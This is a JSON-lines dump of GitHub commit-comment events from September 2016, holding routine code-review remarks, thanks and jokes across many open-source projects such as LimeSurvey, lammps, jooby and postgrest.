{"id":"4518288923","type":"CommitCommentEvent","actor":{"login":"bennuttall"},"repo":{"name":"RPi-Distro/python-gpiozero"},"payload":{"comment":{"id":18903618,"position":65,"line":576,"path":"gpiozero/pins/data.py","commit_id":"6cc308e44a987db1cc3e038b07627add91e1c5ad","created_at":"2016-09-05T20:42:20Z","updated_at":"2016-09-05T20:42:20Z","body":"Did this get addressed?"}},"created_at":"2016-09-05T20:42:20Z"}
{"id":"4518289077","type":"CommitCommentEvent","actor":{"login":"yossigil"},"repo":{"name":"SpartanRefactoring/spartan-refactoring"},"payload":{"comment":{"id":18903619,"position":null,"line":null,"path":null,"commit_id":"0d94772b75d4b168808edc35345a3d6f3740ece8","created_at":"2016-09-05T20:42:25Z","updated_at":"2016-09-05T20:42:25Z","body":"✌"}},"created_at":"2016-09-05T20:42:25Z"}
{"id":"4518292256","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18903627,"position":5,"line":691,"path":"application/helpers/replacements_helper.php","commit_id":"b1c10d5d9f5f4f0e482c071bce787aee3864bdad","created_at":"2016-09-05T20:43:58Z","updated_at":"2016-09-05T20:43:58Z","body":"It's whole 2.50 misconcept actually : we don't have any \"core\" css to allow easily bug fix and new feature.\r\n\r\nExampe : in 2.06 : we can fix numeric slider use jquery slider, then we don't broke template when update. Today : there are a file in template for slider : https://github.com/LimeSurvey/LimeSurvey/blob/master/templates/default/css/bootstrap-slider.css . Why we don't put it in \"core\" ?\r\n\r\nWe have 2 update like this in fork\r\n@PeterEmil update https://github.com/Shnoulle/LimeSurvey-Shnoulle/blob/answers_html/templates/default/css/awesome-bootstrap-checkbox/awesome-bootstrap-checkbox.css\r\nMe add a file : https://github.com/Shnoulle/LimeSurvey-Shnoulle/blob/answers_html/templates/default/css/bootstrap-complement.css\r\n\r\nI really think we need some LS core file\r\n- bootsrap.css (if use bootsrap in config.xml)\r\n- awesome-bs-checkbox : if we activate it .... (but we don't have it in config.xml actually)\r\n- limesurvey.css : some specific css for ls (like this one)\r\n- boostratp-fix.css : because bs is a framework, and a framework is never complete for a whole project.\r\n- "}},"created_at":"2016-09-05T20:43:58Z"}
{"id":"4518292971","type":"CommitCommentEvent","actor":{"login":"timattox"},"repo":{"name":"lammps/lammps"},"payload":{"comment":{"id":18903629,"position":null,"line":null,"path":null,"commit_id":"222e9de4c88908c0ce3f10d658830256f8045d3e","created_at":"2016-09-05T20:44:20Z","updated_at":"2016-09-05T20:44:20Z","body":"Somehow this commit changed the output from several of our internal USER-DPD tests.  I have no idea how, but I bisected the git commits, and this seemed to be the source of the change.  I will investigate further."}},"created_at":"2016-09-05T20:44:20Z"}
{"id":"4518293001","type":"CommitCommentEvent","actor":{"login":"fhe-odoo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":18903630,"position":null,"line":null,"path":null,"commit_id":"7b489ed42c00f42dea3be7d21208c57d396da630","created_at":"2016-09-05T20:44:20Z","updated_at":"2016-09-05T20:44:20Z","body":"Yes!"}},"created_at":"2016-09-05T20:44:20Z"}
{"id":"4518293109","type":"CommitCommentEvent","actor":{"login":"scvnc"},"repo":{"name":"podverse/podverse-web"},"payload":{"comment":{"id":18903631,"position":11,"line":54,"path":"src/services/clip/ClipService.js","commit_id":"8cac8d1e70e97c229b604f617a5168dca71bbddb","created_at":"2016-09-05T20:44:24Z","updated_at":"2016-09-05T20:44:24Z","body":"Currently we've been developing against SQLite which is designed for single-user applications. A full featured database such as postgresql or mysql is better suited for a web app like this."}},"created_at":"2016-09-05T20:44:24Z"}
{"id":"4518294651","type":"CommitCommentEvent","actor":{"login":"kvz"},"repo":{"name":"kvz/json2hcl"},"payload":{"comment":{"id":18903633,"position":null,"line":null,"path":null,"commit_id":"95898c46697f791fc18e91e6f9786cd38037d57b","created_at":"2016-09-05T20:45:15Z","updated_at":"2016-09-05T20:45:15Z","body":"Nice, this would have taken me a ton of time @Acconut 👍 "}},"created_at":"2016-09-05T20:45:15Z"}
{"id":"4518295726","type":"CommitCommentEvent","actor":{"login":"joerick"},"repo":{"name":"tingbot/tide-electron"},"payload":{"comment":{"id":18903635,"position":11,"line":39,"path":"app/src/tingprocess.js","commit_id":"db3a64a80da74b9f9557772433260d84cbed6526","created_at":"2016-09-05T20:45:45Z","updated_at":"2016-09-05T20:45:45Z","body":"... that's !== 'win32' haha"}},"created_at":"2016-09-05T20:45:45Z"}
{"id":"4518296077","type":"CommitCommentEvent","actor":{"login":"markulf"},"repo":{"name":"FStarLang/FStar"},"payload":{"comment":{"id":18903637,"position":null,"line":null,"path":null,"commit_id":"58aa958e560ec45c617074c1cdc7875981ea8f6e","created_at":"2016-09-05T20:45:56Z","updated_at":"2016-09-05T20:45:56Z","body":"Looks good, can we give the functions types that express AEAD security guarantees?"}},"created_at":"2016-09-05T20:45:56Z"}
{"id":"4518296598","type":"CommitCommentEvent","actor":{"login":"rodrigotechera"},"repo":{"name":"jooby-project/jooby"},"payload":{"comment":{"id":18903639,"position":9,"line":9,"path":"jooby-assets-dr-svg-sprites/src/main/resources/dr-svg-sprites/README.md","commit_id":"f4129351c773c802ab766d9274de291445ab8b4a","created_at":"2016-09-05T20:46:10Z","updated_at":"2016-09-05T20:46:10Z","body":"Notice that this link will send you to a 404 page in github, https://github.com/jooby-project/jooby/blob/master/jooby-assets-svg-sprites/src/main/resources/dr-svg-sprites/CONTRIBUTING.md"}},"created_at":"2016-09-05T20:46:10Z"}
{"id":"4518297007","type":"CommitCommentEvent","actor":{"login":"SexualRhinoceros"},"repo":{"name":"Jiiks/BetterDiscordApp"},"payload":{"comment":{"id":18903640,"position":null,"line":null,"path":null,"commit_id":"48d4a58102dcdbc1ce888b322df2f7aa834eb695","created_at":"2016-09-05T20:46:21Z","updated_at":"2016-09-05T20:46:21Z","body":"[Nice Meme](https://github.com/Jiiks/BetterDiscordApp/commit/48d4a58102dcdbc1ce888b322df2f7aa834eb695#diff-1e54f5e549b0ebebae43c3e3694ee656R168)"}},"created_at":"2016-09-05T20:46:21Z"}
{"id":"4518297485","type":"CommitCommentEvent","actor":{"login":"Rob4001"},"repo":{"name":"tingbot/tide-electron"},"payload":{"comment":{"id":18903642,"position":null,"line":null,"path":null,"commit_id":"7e682bdcb05bed0bd8f7714b54b2df533f49b1e8","created_at":"2016-09-05T20:46:34Z","updated_at":"2016-09-05T20:46:34Z","body":"Reverted for Mac and Linux in db3a64a80da74b9f9557772433260d84cbed6526"}},"created_at":"2016-09-05T20:46:34Z"}
{"id":"4518298415","type":"CommitCommentEvent","actor":{"login":"rodrigotechera"},"repo":{"name":"jooby-project/jooby"},"payload":{"comment":{"id":18903646,"position":71,"line":71,"path":"jooby-assets-dr-svg-sprites/src/main/resources/dr-svg-sprites/README.md","commit_id":"f4129351c773c802ab766d9274de291445ab8b4a","created_at":"2016-09-05T20:47:01Z","updated_at":"2016-09-05T20:47:01Z","body":"Not sure why, but this link doesn't position the page on this option. The link `https://github.com/jooby-project/jooby/blob/f4129351c773c802ab766d9274de291445ab8b4a/jooby-assets-dr-svg-sprites/src/main/resources/dr-svg-sprites/README.md#optionscssPrefix` seems to be build correctly."}},"created_at":"2016-09-05T20:47:01Z"}
{"id":"4518298536","type":"CommitCommentEvent","actor":{"login":"rodrigotechera"},"repo":{"name":"jooby-project/jooby"},"payload":{"comment":{"id":18903647,"position":84,"line":84,"path":"jooby-assets-dr-svg-sprites/src/main/resources/dr-svg-sprites/README.md","commit_id":"f4129351c773c802ab766d9274de291445ab8b4a","created_at":"2016-09-05T20:47:06Z","updated_at":"2016-09-05T20:47:06Z","body":"Same as above. This link is not working."}},"created_at":"2016-09-05T20:47:06Z"}
{"id":"4518298947","type":"CommitCommentEvent","actor":{"login":"rodrigotechera"},"repo":{"name":"jooby-project/jooby"},"payload":{"comment":{"id":18903648,"position":131,"line":131,"path":"jooby-assets-dr-svg-sprites/src/main/resources/dr-svg-sprites/README.md","commit_id":"f4129351c773c802ab766d9274de291445ab8b4a","created_at":"2016-09-05T20:47:18Z","updated_at":"2016-09-05T20:47:18Z","body":"This option is not listed above: https://github.com/jooby-project/jooby/commit/f4129351c773c802ab766d9274de291445ab8b4a#diff-fece3726d1d17c787eba1aee13d987a4R64"}},"created_at":"2016-09-05T20:47:18Z"}
{"id":"4518299328","type":"CommitCommentEvent","actor":{"login":"rodrigotechera"},"repo":{"name":"jooby-project/jooby"},"payload":{"comment":{"id":18903650,"position":239,"line":239,"path":"jooby-assets-dr-svg-sprites/src/main/resources/dr-svg-sprites/README.md","commit_id":"f4129351c773c802ab766d9274de291445ab8b4a","created_at":"2016-09-05T20:47:30Z","updated_at":"2016-09-05T20:47:30Z","body":"This option is not listed above: https://github.com/jooby-project/jooby/commit/f4129351c773c802ab766d9274de291445ab8b4a#diff-fece3726d1d17c787eba1aee13d987a4R64"}},"created_at":"2016-09-05T20:47:30Z"}
{"id":"4518301233","type":"CommitCommentEvent","actor":{"login":"leonklingele"},"repo":{"name":"bndw/pick"},"payload":{"comment":{"id":18903652,"position":null,"line":null,"path":null,"commit_id":"87f27066637a803c003647ff4babc4a39b57e8ad","created_at":"2016-09-05T20:48:26Z","updated_at":"2016-09-05T20:48:26Z","body":"Only one change per commit, please 😄 "}},"created_at":"2016-09-05T20:48:26Z"}
{"id":"4518301715","type":"CommitCommentEvent","actor":{"login":"akohlmey"},"repo":{"name":"lammps/lammps"},"payload":{"comment":{"id":18903657,"position":null,"line":null,"path":null,"commit_id":"222e9de4c88908c0ce3f10d658830256f8045d3e","created_at":"2016-09-05T20:48:42Z","updated_at":"2016-09-05T20:48:42Z","body":"This is very strange and difficult to rationalize. Can you show me an example, what kind of output is changes and how?"}},"created_at":"2016-09-05T20:48:42Z"}
{"id":"4518303448","type":"CommitCommentEvent","actor":{"login":"leonklingele"},"repo":{"name":"bndw/pick"},"payload":{"comment":{"id":18903660,"position":null,"line":null,"path":null,"commit_id":"87f27066637a803c003647ff4babc4a39b57e8ad","created_at":"2016-09-05T20:49:38Z","updated_at":"2016-09-05T20:49:38Z","body":"BTW: Use `git commit -m '$HOME'` to not expand `$HOME`"}},"created_at":"2016-09-05T20:49:38Z"}
{"id":"4518303885","type":"CommitCommentEvent","actor":{"login":"cdsmith"},"repo":{"name":"google/codeworld"},"payload":{"comment":{"id":18903661,"position":null,"line":null,"path":null,"commit_id":"0d8d554be065b2111999a7f7862013cc7070b193","created_at":"2016-09-05T20:49:51Z","updated_at":"2016-09-05T20:49:51Z","body":"Thanks!  I did this mostly as a proof of concept.  I'm certainly not attached to hindent, and I also tend to like vertical alignment.\r\n\r\nMy main concern, though, is to find something flexible enough that I can make it work for the classic CodeWorld mode, as well.  That means being able to do outlandish and heretical things like force parentheses around function arguments, and remove spaces between functions and their parameters.  So I'm not sure, but finishing this might involve writing a new formatter, in the end..."}},"created_at":"2016-09-05T20:49:51Z"}
{"id":"4518304387","type":"CommitCommentEvent","actor":{"login":"joerick"},"repo":{"name":"tingbot/tide-electron"},"payload":{"comment":{"id":18903662,"position":null,"line":null,"path":null,"commit_id":"ed8925b92bd757d205f9db555c02a45de4d0e57a","created_at":"2016-09-05T20:50:08Z","updated_at":"2016-09-05T20:50:08Z","body":"👍 \r\n"}},"created_at":"2016-09-05T20:50:08Z"}
{"id":"4518304411","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18903663,"position":null,"line":null,"path":null,"commit_id":"7f312ebc18608d34ec11ddb5f45192695a42e574","created_at":"2016-09-05T20:50:09Z","updated_at":"2016-09-05T20:50:09Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#ZGZ5RkilRCqgWEhNHXOt7Q"}},"created_at":"2016-09-05T20:50:09Z"}
{"id":"4518305156","type":"CommitCommentEvent","actor":{"login":"wesm"},"repo":{"name":"apache/parquet-cpp"},"payload":{"comment":{"id":18903665,"position":null,"line":null,"path":null,"commit_id":"fa6e47616e818f33d8d4774ce43ae6d62cdd59bd","created_at":"2016-09-05T20:50:28Z","updated_at":"2016-09-05T20:50:28Z","body":"see PARQUET-708"}},"created_at":"2016-09-05T20:50:28Z"}
{"id":"4518305474","type":"CommitCommentEvent","actor":{"login":"rodrigotechera"},"repo":{"name":"jooby-project/jooby"},"payload":{"comment":{"id":18903666,"position":1,"line":1,"path":"jooby-assets-dr-svg-sprites/src/main/resources/dr-svg-sprites/README.md","commit_id":"f4129351c773c802ab766d9274de291445ab8b4a","created_at":"2016-09-05T20:50:39Z","updated_at":"2016-09-05T20:50:39Z","body":"Did you write this files? I'm starting to think you didn't and probably it doesn't worth reviewing it :smile: "}},"created_at":"2016-09-05T20:50:39Z"}
{"id":"4518306246","type":"CommitCommentEvent","actor":{"login":"Rob4001"},"repo":{"name":"tingbot/tide-electron"},"payload":{"comment":{"id":18903668,"position":null,"line":null,"path":null,"commit_id":"ed8925b92bd757d205f9db555c02a45de4d0e57a","created_at":"2016-09-05T20:51:01Z","updated_at":"2016-09-05T20:51:01Z","body":"Long Day :tired_face: "}},"created_at":"2016-09-05T20:51:01Z"}
{"id":"4518307209","type":"CommitCommentEvent","actor":{"login":"bndw"},"repo":{"name":"bndw/pick"},"payload":{"comment":{"id":18903672,"position":null,"line":null,"path":null,"commit_id":"87f27066637a803c003647ff4babc4a39b57e8ad","created_at":"2016-09-05T20:51:28Z","updated_at":"2016-09-05T20:51:28Z","body":"@leonklingele Yeah, that home expansion was a bummer. Also missed the squash-to-single-commit on the merge :feelsbadman:"}},"created_at":"2016-09-05T20:51:28Z"}
{"id":"4518307491","type":"CommitCommentEvent","actor":{"login":"Kaffeine"},"repo":{"name":"TelepathyQt/telepathy-nonsense"},"payload":{"comment":{"id":18903673,"position":null,"line":null,"path":null,"commit_id":"5486bf810fccbb2c2aebcdaf49da0d8373353107","created_at":"2016-09-05T20:51:37Z","updated_at":"2016-09-05T20:51:37Z","body":"@olesalscheider , would it be OK to be done in this way?\r\nI would fix up this commit to the previous one."}},"created_at":"2016-09-05T20:51:37Z"}
{"id":"4518310400","type":"CommitCommentEvent","actor":{"login":"soctkoren"},"repo":{"name":"soctkoren/Novelist"},"payload":{"comment":{"id":18903676,"position":null,"line":null,"path":null,"commit_id":"81c2e94135cf88378e663c2b4846f15bcc4a78d5","created_at":"2016-09-05T20:53:00Z","updated_at":"2016-09-05T20:53:00Z","body":"@bootcoder wasn't sure how to turn this in. "}},"created_at":"2016-09-05T20:53:00Z"}
{"id":"4518310783","type":"CommitCommentEvent","actor":{"login":"jdemaeyer"},"repo":{"name":"krotkiewicz/shub"},"payload":{"comment":{"id":18903678,"position":22,"line":25,"path":"tests/test_deploy.py","commit_id":"95ba0e0e8d4162b0775c6f3a3784d1b067f4b9f8","created_at":"2016-09-05T20:53:15Z","updated_at":"2016-09-05T20:53:15Z","body":"Looks like this isn't used anywhere"}},"created_at":"2016-09-05T20:53:15Z"}
{"id":"4518310989","type":"CommitCommentEvent","actor":{"login":"mkordas"},"repo":{"name":"jcabi/jcabi-parent"},"payload":{"comment":{"id":18903679,"position":null,"line":null,"path":null,"commit_id":"4b641392d53c24633d75cc5671694e3a3785b7fa","created_at":"2016-09-05T20:53:20Z","updated_at":"2016-09-05T20:53:20Z","body":"@yegor256 ping"}},"created_at":"2016-09-05T20:53:20Z"}
{"id":"4518311496","type":"CommitCommentEvent","actor":{"login":"Kaffeine"},"repo":{"name":"TelepathyQt/telepathy-nonsense"},"payload":{"comment":{"id":18903680,"position":null,"line":null,"path":null,"commit_id":"21607f772da696f044db8fb4e40f1abeff43e5b9","created_at":"2016-09-05T20:53:34Z","updated_at":"2016-09-05T20:53:34Z","body":"Debug output before this commit:\r\n```\r\n...\r\n05.09.2016 22:47:54.482000 - [/home/kaffeine/devel/telepathy/telepathy-bundle/telepathy-qt/TelepathyQt/debug.cpp:146, void Tp::Debug::invokeDebugCallback()] tp-qt 0.9.8 DEBUG: BaseConnectionRequestsInterface::requestableChannelClasses \r\n05.09.2016 22:47:54.482000 - [/home/kaffeine/devel/telepathy/telepathy-bundle/telepathy-qt/examples/nonsense/connection.cc:493, Tp::ContactAttributesMap Connection::getContactAttributes(const Tp::UIntList&, const QStringList&, Tp::DBusError*)] ENTERING  Tp::ContactAttributesMap Connection::getContactAttributes(const Tp::UIntList&, const QStringList&, Tp::DBusError*) - Handles:  (1)\r\n...\r\n```\r\n\r\nDebug output after this commit:\r\n```\r\n...\r\n05.09.2016 22:47:54.482000 - [telepathy-qt/TelepathyQt/debug.cpp:146, void Tp::Debug::invokeDebugCallback()] tp-qt 0.9.8 DEBUG: BaseConnectionRequestsInterface::requestableChannelClasses \r\n05.09.2016 22:47:54.482000 - [nonsense/connection.cc:493, Tp::ContactAttributesMap Connection::getContactAttributes(const Tp::UIntList&, const QStringList&, Tp::DBusError*)] ENTERING  Tp::ContactAttributesMap Connection::getContactAttributes(const Tp::UIntList&, const QStringList&, Tp::DBusError*) - Handles:  (1)\r\n...\r\n```\r\n"}},"created_at":"2016-09-05T20:53:34Z"}
{"id":"4518312347","type":"CommitCommentEvent","actor":{"login":"leonklingele"},"repo":{"name":"bndw/pick"},"payload":{"comment":{"id":18903681,"position":7,"line":37,"path":"backends/disk.go","commit_id":"87f27066637a803c003647ff4babc4a39b57e8ad","created_at":"2016-09-05T20:54:00Z","updated_at":"2016-09-05T20:54:00Z","body":"Why do you check if it starts with `$HOME`?\r\nSimply Do `strings.Replace(safePath, \"$HOME\", homeDir, -1)`."}},"created_at":"2016-09-05T20:54:00Z"}
{"id":"4518313631","type":"CommitCommentEvent","actor":{"login":"markulf"},"repo":{"name":"FStarLang/FStar"},"payload":{"comment":{"id":18903684,"position":null,"line":null,"path":null,"commit_id":"75791d29e168daf5d599fa97a215d87173b78d95","created_at":"2016-09-05T20:54:40Z","updated_at":"2016-09-05T20:54:40Z","body":"Can we only idealize modules that don't caller allocate keys? "}},"created_at":"2016-09-05T20:54:40Z"}
{"id":"4518314944","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18903687,"position":null,"line":null,"path":null,"commit_id":"4c1a251c7a5c603e2ca987335b2f1ce4197f3820","created_at":"2016-09-05T20:55:17Z","updated_at":"2016-09-05T20:55:17Z","body":"Maybe this can move in event beforeQuestionRender "}},"created_at":"2016-09-05T20:55:17Z"}
{"id":"4518318764","type":"CommitCommentEvent","actor":{"login":"pwells19"},"repo":{"name":"Gumanji/Wooster-Github-Demo"},"payload":{"comment":{"id":18903705,"position":null,"line":null,"path":null,"commit_id":"0aacf3b8ceccee8de22102089465d24b7f317ce7","created_at":"2016-09-05T20:57:11Z","updated_at":"2016-09-05T20:57:11Z","body":"Yes! Yes!"}},"created_at":"2016-09-05T20:57:11Z"}
{"id":"4518319332","type":"CommitCommentEvent","actor":{"login":"bndw"},"repo":{"name":"bndw/pick"},"payload":{"comment":{"id":18903706,"position":7,"line":37,"path":"backends/disk.go","commit_id":"87f27066637a803c003647ff4babc4a39b57e8ad","created_at":"2016-09-05T20:57:26Z","updated_at":"2016-09-05T20:57:26Z","body":"I wasn't totally sure it would be invalid if there was another \"$HOME\" in the path, and `n=-1` would replace all occurrences."}},"created_at":"2016-09-05T20:57:26Z"}
{"id":"4518319530","type":"CommitCommentEvent","actor":{"login":"thargor6"},"repo":{"name":"thargor6/JWildfire"},"payload":{"comment":{"id":18903707,"position":null,"line":null,"path":null,"commit_id":"e588469d5a2d89ebce757165a986e17c185c2734","created_at":"2016-09-05T20:57:31Z","updated_at":"2016-09-05T20:57:31Z","body":"True, but it makes no sense to maintain it for one user actually using it :-)"}},"created_at":"2016-09-05T20:57:31Z"}
{"id":"4518319985","type":"CommitCommentEvent","actor":{"login":"mooeypoo"},"repo":{"name":"mooeypoo/MWStew"},"payload":{"comment":{"id":18903708,"position":null,"line":null,"path":null,"commit_id":"3933b6ad4bf7d253a3867c566c68066a5ba91598","created_at":"2016-09-05T20:57:44Z","updated_at":"2016-09-05T20:57:44Z","body":"Yes! Sorry, I had some connection issues and then I completely forgot (sorry!)\r\n\r\nI updated now. It should work."}},"created_at":"2016-09-05T20:57:44Z"}
{"id":"4518321122","type":"CommitCommentEvent","actor":{"login":"ruslantalpa"},"repo":{"name":"begriffs/postgrest"},"payload":{"comment":{"id":18903714,"position":15,"line":52,"path":"src/PostgREST/Middleware.hs","commit_id":"d7066e573c388fd9c6bcb8ee345d6160a219b78f","created_at":"2016-09-05T20:58:17Z","updated_at":"2016-09-05T20:58:17Z","body":"some more thought needs to go into this (having the secret as a variable) in the env on each request, + this can end up in the logs, maybe it's better to let the user even hardcode the secret in the rpc proc.\r\n"}},"created_at":"2016-09-05T20:58:17Z"}
{"id":"4518324201","type":"CommitCommentEvent","actor":{"login":"joel16"},"repo":{"name":"joel16/CyanogenPSP"},"payload":{"comment":{"id":18903728,"position":null,"line":null,"path":null,"commit_id":"a2aa88dff997aba2a90ab4b3a4b047dbe5380857","created_at":"2016-09-05T20:59:48Z","updated_at":"2016-09-05T20:59:48Z","body":"Just so you guys know, its still part of Phoenix Game Engine."}},"created_at":"2016-09-05T20:59:48Z"}
{"id":"4518324401","type":"CommitCommentEvent","actor":{"login":"hellionoftroy"},"repo":{"name":"hellionoftroy/practice"},"payload":{"comment":{"id":18903730,"position":3,"line":3,"path":"README.md","commit_id":"3641caa97c72954300266f3a201338ef15169c82","created_at":"2016-09-05T20:59:55Z","updated_at":"2016-09-05T20:59:55Z","body":"add \"with\" before \"github\". "}},"created_at":"2016-09-05T20:59:55Z"}
{"id":"4518325688","type":"CommitCommentEvent","actor":{"login":"dervys75"},"repo":{"name":"dervys75/monprojetphp"},"payload":{"comment":{"id":18903736,"position":null,"line":null,"path":null,"commit_id":"3a4014a7825ad8c6121eb34805c63bcc48c75486","created_at":"2016-09-05T21:00:28Z","updated_at":"2016-09-05T21:00:28Z","body":"test"}},"created_at":"2016-09-05T21:00:28Z"}
{"id":"4518326076","type":"CommitCommentEvent","actor":{"login":"YPohiba"},"repo":{"name":"YPohiba/TestGolangBlog"},"payload":{"comment":{"id":18903737,"position":7,"line":7,"path":"models/Post.go","commit_id":"e5462c626d7d9dc9d4ae42ba0aa6d42981aaa729","created_at":"2016-09-05T21:00:38Z","updated_at":"2016-09-05T21:00:38Z","body":"e3"}},"created_at":"2016-09-05T21:00:38Z"}
{"id":"4518326372","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/chromium"},"payload":{"comment":{"id":18903739,"position":null,"line":null,"path":null,"commit_id":"fc0f79bf33e79ac8c75ffec32e0cf0dda8ab8bcf","created_at":"2016-09-05T21:00:46Z","updated_at":"2016-09-05T21:00:46Z","body":"++"}},"created_at":"2016-09-05T21:00:46Z"}
{"id":"4518326432","type":"CommitCommentEvent","actor":{"login":"lefevre00"},"repo":{"name":"lefevre00/parking"},"payload":{"comment":{"id":18903740,"position":null,"line":null,"path":null,"commit_id":"27d27f5040ec151804789f2ce42d02ea834b0966","created_at":"2016-09-05T21:00:48Z","updated_at":"2016-09-05T21:00:48Z","body":"Ca fait plusieurs fois que je remarque que le commit ne monter pas les lignes qui changent mais fait changer tout le fichier.\r\nC'est pas trop normal, comment procede tu pour commiter ?"}},"created_at":"2016-09-05T21:00:48Z"}
{"id":"4518329715","type":"CommitCommentEvent","actor":{"login":"tomkralidis"},"repo":{"name":"geopython/pywps"},"payload":{"comment":{"id":18903746,"position":2,"line":null,"path":"VERSION.txt","commit_id":"4a35a4942f1427faee482abed4b5658a9f549c05","created_at":"2016-09-05T21:02:22Z","updated_at":"2016-09-05T21:02:22Z","body":"To be consistent we should have the version identifier formatted as 4.0.0-rc2"}},"created_at":"2016-09-05T21:02:22Z"}
{"id":"4518330156","type":"CommitCommentEvent","actor":{"login":"lefevre00"},"repo":{"name":"lefevre00/parking"},"payload":{"comment":{"id":18903748,"position":null,"line":null,"path":null,"commit_id":"d067a3da871ecfa4f069313cc0c1663188a1755c","created_at":"2016-09-05T21:02:34Z","updated_at":"2016-09-05T21:02:34Z","body":"Yes vive la doc propre :+1: "}},"created_at":"2016-09-05T21:02:34Z"}
{"id":"4518330448","type":"CommitCommentEvent","actor":{"login":"wiiaboo"},"repo":{"name":"jb-alvarado/media-autobuild_suite"},"payload":{"comment":{"id":18903750,"position":null,"line":null,"path":null,"commit_id":"695804f1f5b0946852e956fc81a23ee643cb1748","created_at":"2016-09-05T21:02:42Z","updated_at":"2016-09-05T21:02:42Z","body":"You install wheels (.whl) using pip. I have no idea if it works with msys2 python, i have it installed in windows python2."}},"created_at":"2016-09-05T21:02:42Z"}
{"id":"4518330579","type":"CommitCommentEvent","actor":{"login":"sgdc3"},"repo":{"name":"AuthMe/AuthMeReloaded"},"payload":{"comment":{"id":18903751,"position":null,"line":null,"path":null,"commit_id":"bc9d67abbd7f2d42c028ead9f5a9d9ad73c31d85","created_at":"2016-09-05T21:02:47Z","updated_at":"2016-09-05T21:02:47Z","body":"@loveGhb Fine! Good luck with your server :)"}},"created_at":"2016-09-05T21:02:47Z"}
{"id":"4518330915","type":"CommitCommentEvent","actor":{"login":"ruslantalpa"},"repo":{"name":"begriffs/postgrest"},"payload":{"comment":{"id":18903753,"position":24,"line":102,"path":"src/PostgREST/App.hs","commit_id":"d7066e573c388fd9c6bcb8ee345d6160a219b78f","created_at":"2016-09-05T21:02:57Z","updated_at":"2016-09-05T21:02:57Z","body":"the way this is executed makes it so that it's a separate roundtrip to the db but this actually is no different then a `claim` which all are concatenated into a single sql string (separated by `;`) and sent to the server all at once."}},"created_at":"2016-09-05T21:02:57Z"}
{"id":"4518331739","type":"CommitCommentEvent","actor":{"login":"jknack"},"repo":{"name":"jooby-project/jooby"},"payload":{"comment":{"id":18903754,"position":1,"line":1,"path":"jooby-assets-dr-svg-sprites/src/main/resources/dr-svg-sprites/README.md","commit_id":"f4129351c773c802ab766d9274de291445ab8b4a","created_at":"2016-09-05T21:03:21Z","updated_at":"2016-09-05T21:03:21Z","body":"I don't 😄 . It is a copy of https://github.com/drdk/dr-svg-sprites"}},"created_at":"2016-09-05T21:03:21Z"}
{"id":"4518332618","type":"CommitCommentEvent","actor":{"login":"Gumanji"},"repo":{"name":"pwells19/Wooster-Github-Demo"},"payload":{"comment":{"id":18903756,"position":null,"line":null,"path":null,"commit_id":"81415210d50acf21bc8a21c909ad003a49c4a02c","created_at":"2016-09-05T21:03:49Z","updated_at":"2016-09-05T21:03:49Z","body":"\r\n  \r\nAccording to all known laws\r\nof aviation,\r\n\r\n  \r\nthere is no way a bee\r\nshould be able to fly.\r\n\r\n  \r\nIts wings are too small to get\r\nits fat little body off the ground.\r\n\r\n  \r\nThe bee, of course, flies anyway\r\n\r\n  \r\nbecause bees don't care\r\nwhat humans think is impossible.\r\n\r\n  \r\nYellow, black. Yellow, black.\r\nYellow, black. Yellow, black.\r\n\r\n  \r\nOoh, black and yellow!\r\nLet's shake it up a little.\r\n"}},"created_at":"2016-09-05T21:03:49Z"}
{"id":"4518332745","type":"CommitCommentEvent","actor":{"login":"lefevre00"},"repo":{"name":"lefevre00/parking"},"payload":{"comment":{"id":18903757,"position":56,"line":56,"path":"src/main/java/org/friends/app/view/route/RegisterRoute.java","commit_id":"27d27f5040ec151804789f2ce42d02ea834b0966","created_at":"2016-09-05T21:03:54Z","updated_at":"2016-09-05T21:03:54Z","body":"Ligne inutile car on n'a pas besoin de creer un User pour le chercher en base via son email/id."}},"created_at":"2016-09-05T21:03:54Z"}
{"id":"4518335444","type":"CommitCommentEvent","actor":{"login":"lefevre00"},"repo":{"name":"lefevre00/parking"},"payload":{"comment":{"id":18903761,"position":152,"line":69,"path":"src/main/java/org/friends/app/view/route/RegisterRoute.java","commit_id":"27d27f5040ec151804789f2ce42d02ea834b0966","created_at":"2016-09-05T21:05:19Z","updated_at":"2016-09-05T21:05:19Z","body":"Le numéro de place doit être un nombre"}},"created_at":"2016-09-05T21:05:19Z"}
{"id":"4518340801","type":"CommitCommentEvent","actor":{"login":"jbush001"},"repo":{"name":"mathieupassenaud/resume_operating_system"},"payload":{"comment":{"id":18903768,"position":79,"line":79,"path":"lib/resume.c","commit_id":"407156da66f07224f0d9e36256c9789b64c2c2fa","created_at":"2016-09-05T21:08:12Z","updated_at":"2016-09-05T21:08:12Z","body":"embedded? :)"}},"created_at":"2016-09-05T21:08:12Z"}
{"id":"4518340842","type":"CommitCommentEvent","actor":{"login":"mmzx"},"repo":{"name":"mmzx/pdf2line"},"payload":{"comment":{"id":18903769,"position":null,"line":null,"path":null,"commit_id":"bfe77fe7f1c1e334b5fbc3615e67ad7b1d3287ec","created_at":"2016-09-05T21:08:14Z","updated_at":"2016-09-05T21:08:14Z","body":"I am not sure what line 129 shall mean.\r\nGHCi complains that, \r\n_pdf2line.hs:129:9:\r\n    Parse error in pattern: n + 1\r\nFailed, modules loaded: none._\r\n\r\n**audreyt** : Do you think it could be written as: _getInt n = liftM2 mkInt getWord8 (getInt n)_ ?\r\n"}},"created_at":"2016-09-05T21:08:14Z"}
{"id":"4518344737","type":"CommitCommentEvent","actor":{"login":"Acconut"},"repo":{"name":"kvz/json2hcl"},"payload":{"comment":{"id":18903775,"position":null,"line":null,"path":null,"commit_id":"95898c46697f791fc18e91e6f9786cd38037d57b","created_at":"2016-09-05T21:10:07Z","updated_at":"2016-09-05T21:10:07Z","body":"That's why we are a team :)"}},"created_at":"2016-09-05T21:10:07Z"}
